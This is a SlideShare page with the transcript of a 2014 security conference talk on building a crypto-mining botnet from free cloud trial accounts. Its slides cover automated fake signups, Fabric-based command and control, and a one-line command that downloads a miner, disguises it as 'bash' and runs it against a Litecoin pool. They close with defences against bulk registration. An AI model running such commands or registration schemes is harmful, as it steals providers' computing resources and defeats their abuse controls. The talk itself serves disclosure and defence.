CloudBots - Harvesting Crypto Currency Like a Botnet Farmer
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

on

  • 574 views

What happens when computer criminals start using friendly cloud services for malicious activities? In this presentation, we explore how to (ab)use free trials to get access to vast amounts of ...

What happens when computer criminals start using friendly cloud services for malicious activities? In this presentation, we explore how to (ab)use free trials to get access to vast amounts of computing power, storage, and pre-made hacking environments. Oh! Also, we violate the hell out of some terms of service.

We explore just how easy it is to generate massive amounts of unique email addresses; in order to register free trial accounts, deploy code, and distribute commands (C2). We managed to build this cloud-based botnet all for the low cost of $0 and semi-legally. This botnet doesn't get flagged as malware, blocked by web filters, or get taken over. This is the stuff of nightmares!

While riding on the fluffy Kumobot (kumo means cloud in Japanese), it was discovered that we were not the only ones doing this! With the rise of crypto currency we now face the impending rise of botnets that mine for digital gold on someone else's systems with someone else's dime footing the electric bill. Through our efforts in building a cloud-based botnet we built enough tools to share a framework for penetration testers and security researchers. The anti-anti-automation framework will show those tasked with defense exactly what it looks like when their free trial gets assaulted.

Statistics

Views

Total Views
574
Views on SlideShare
514
Embed Views
60

Actions

Likes
0
Downloads
16
Comments
0

3 Embeds 60

http://www.slideee.com 49
https://twitter.com 10
http://translate.googleusercontent.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer Presentation Transcript

  • 1. CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
  • 2. 2 …and Violating Terms of Service Building a Botnet with Free Cloud-based Services
  • 3. 3 Main Topics •  Could we build a botnet from freely available cloud services? •  Will we see the rise of more cloud based botnets? •  Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
  • 4. 4 Platform as a Service Cloud PaaS
  • 5. 5 Platform as a Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/AZ4nYp
  • 6. 6 Development Environment as a Service Free Cloud Services
  • 7. AUTOMATION Scripting the Cloud
  • 8. 8 Automating Registration •  Hurdles -  Email address confirmation -  CAPTCHA -  Phone/SMS -  Credit Card Usability vs Security Cloud Providers (In)Security
  • 9. 9 Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
  • 10. 10 Anti-Automation Techniques •  Email address confirmation •  CAPTCHA •  Phone/SMS •  Credit Card Usability vs Security Cloud Providers (In)Security
  • 11. 11
  • 12. 12 Automated email processing -  Wildcard localpart *@domain.com -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
  • 13. local-part@domain.tld Email Address Anatomy
  • 14. 14 Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
  • 15. 15 Unlimited usernames -  Prevent pattern recognition -  Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
  • 16. 16 Unlimited domains -  freedns.afraid.org -  Prevent detection -  Thousands of unique email domains SMTP Services Plethora of Email Addresses
  • 17. 17 Unlimited email addresses Free DNS Subdomains
  • 18. 18 What do we need? •  Free email relay -  Free MX registration •  Process wildcards -  *@domain.tld •  Send unlimited messages -  Unrestricted STMP to HTTP POST/ JSON requests Free Signups Receiving Email and Processing
  • 19. 19 Inbound Mail As A Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/yqoh6U
  • 20. 20 Automated email processing -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
  • 21. 21 <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
  • 22. DEMONSTRATION Automatic Account Creation
  • 23. 23 Automated Registration Workflow Email Addresses
  • 24. 24 MongoDB •  MongoLab •  MongoHQ Keeping track of all accounts Storing Account Information
  • 25. FUNTIVITIES Botnets Are Fun!
  • 26. 26 What can we do? •  Distributed Network Scanning •  Distributed Password Cracking •  DDoS •  Click-fraud •  Crypto Currency Mining •  Data Storage Now we have a botnet! Fun! Botnet Activities
  • 27. 27 Refer Fake Friends Unlimited Storage Space
  • 28. 28 Refer Fake Friends Unlimited Storage Space
  • 29. 29 What are we using? •  Fabric -  Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. •  fab check_hosts –P –z 20 •  fab run_command Botnet C2 Command & Control
  • 30. 30 Unique Amazon IP Addresses Distributed Command [na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13 [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254 [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128 [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72 [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19 [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
  • 31. 31 Make money, money •  Deploying miners •  One command for $$$ All your processors are belong to us Litecoin Mining if [ ! -f bash ]; then wget http://sourceforge.net/projects/ cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler- cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash –url=stratum+tcp://pool.mine-litecoin.com -- userpass=ninja.47:47; rm bash
  • 32. 32 Load After Crypto Currency Mining Distributed Command ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
  • 33. 33 All your processors are belong to us Litecoin Mining
  • 34. CLOUD BREAKOUT Bypassing Restrictions
  • 35. DETECTION No one can catch a ninja!
  • 36. 36 Automatic Backups •  Propagate to other similar services -  e.g. MongoLab ß à MongoHQ •  Infrastructure across multiple service providers •  Easily migrated Armadillo Up ™ Disaster Recovery Plan
  • 37. RISING TREAD Active Attacks
  • 38. 38 Adaptation Cloud Provider Registration
  • 39. 39 Adaptation Cloud Provider Registration
  • 40. 40 Adaptation Cloud Provider Registration
  • 41. 41 Crypto Coins & DDoS Clouds Under Siege
  • 42. 42 Crypto Coins & DDoS Clouds Under Siege
  • 43. PROTECTION Bot Busters
  • 44. 44 What can we do? •  Logic puzzles •  Sound output •  Credit card validation •  Live operators •  Limited-use account •  Heuristic checks •  Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
  • 45. 45 What should we do? •  Analyzing properties of Sybil accounts •  Analyzing the arrival rate and distribution of accounts •  Flag accounts registered with emails from newly registered domain names •  Email verification •  CAPTCHAs •  IP Blacklisting •  Phone/SMS verification •  Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 46. 46 At Abuse vs At Registration Protection Advanced techniques •  Signup flow events -  Detect common activities after signup •  User-agent -  A registration bot may generate a different user-agent for each signup or use uncommon user-agents •  Form submission timing -  A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 47. THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM